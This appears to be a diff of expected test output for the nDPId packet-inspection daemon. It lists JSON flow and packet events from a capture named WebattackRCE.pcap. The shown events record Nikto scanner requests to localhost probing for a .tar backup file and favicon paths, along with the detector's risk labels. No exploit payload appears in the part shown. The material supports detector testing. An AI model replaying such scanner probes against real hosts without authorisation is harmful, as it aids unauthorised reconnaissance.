00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01039{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
